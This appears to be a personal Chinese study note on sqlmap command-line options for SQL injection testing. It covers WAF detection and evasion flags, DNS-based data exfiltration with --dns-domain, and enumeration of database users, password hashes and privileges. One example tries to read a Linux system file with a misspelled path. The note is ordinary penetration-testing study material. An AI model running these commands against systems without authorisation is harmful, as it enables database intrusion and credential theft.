此文说明:
此文仅为自己学习记录使用,督促自己学习,如有侵犯,请联系,歉删!
一.sqlmap 使用的参数记录
1.1 --technique --technique=BEU
B: Boolean-based blind SQL injection(布尔型注入) E: Error-based SQL injection(报错型注入) U: UNION query SQL injection(可联合查询注入) S: Stacked queries SQL injection(可多语句查询注入) T: Time-based blind SQL injection(基于时间延迟注入)
1.2 --random-agent
从./txt/user-angent.txt中随记获取
1.3--level 3 1-5,默认为1
参数且数值>=2的时候也会检查cookie时面的参数
当>=3的时候将检查User-agent和Referer
当level参数设置为3或者3以上,就尝试对user-angent进行注入
risk=RISK 执行测试的风险(0-3,默认为1)
1.4--proxy代理是格式为:http://url:port http://127.0.0.1:8080 代理和bp一起使用
1.5当HTTP(S)代理需要认证是可以使用--proxy-cred参数:username:password。
1.6--ignore-proxy拒绝使用本地局域网的HTTP(S)代理。
1.7 --delay 默认没有延时,设置之后的时间是0.5s
1.8--safe-url 设置sqlmap要访问的正常url 可以设置为此系统的一个正常访问界面
--safe-freq 设置每测试多少条注入语句后才去访问safe-url
1.9--identify-waf
sqlmap可以尝试找出WAF/IPS/IDS保护,方便用户做出绕过方式。目前大约支持30种产品的识别。
1.10--check-waf
WAF/IPS/IDS保护可能会对sqlmap造成很大的困扰,如果怀疑目标有此防护的话,可以使用此参数来测试。 sqlmap将会使用一个不存在的参数来注入测试
1.11--dns-domain=abc.xyz
python sqlmap.py -r abc.txt --skip-waf --random-agent --dns-domain=abc.xyz --dbs
1.12
–is-dba 检测DBMS当前用户是否DBA
–users 枚举数据库管理系统用户
–passwords 枚举数据库管理系统用户密码哈希
–privileges 枚举数据库管理系统用户的权限
–roles 枚举数据库管理系统用户的角色
–dbs 枚举数据库管理系统数据库
–tables 枚举的DBMS数据库中的表
1.13--hex
有时候字符编码的问题,可能导致数据丢失,可以使用hex函数来避免:
1.14--roles
当前用户有权限读取包含所有用户的表的权限时,很可能列举出每个用户的角色,也可以用-U参数指定你想看哪个用户的角色。
仅适用于当前数据库是Oracle的时候
1.15 sqlmap.py-m tg.txt tg.txt跟sqlmap在同一个目录下。
批量对get 链接进行注入检查
1.16salmap直接链接数据库
sqlmap.py -d”mysql://admin:admin@192.168.21.17:3306/testdb” -f –banner –dbs–users
1.17读取linux下的文件
sqlmap.py-u “url” –file /etc/password
链接:https://www.cnblogs.com/hongfei/p/3872156.html
fW:20200325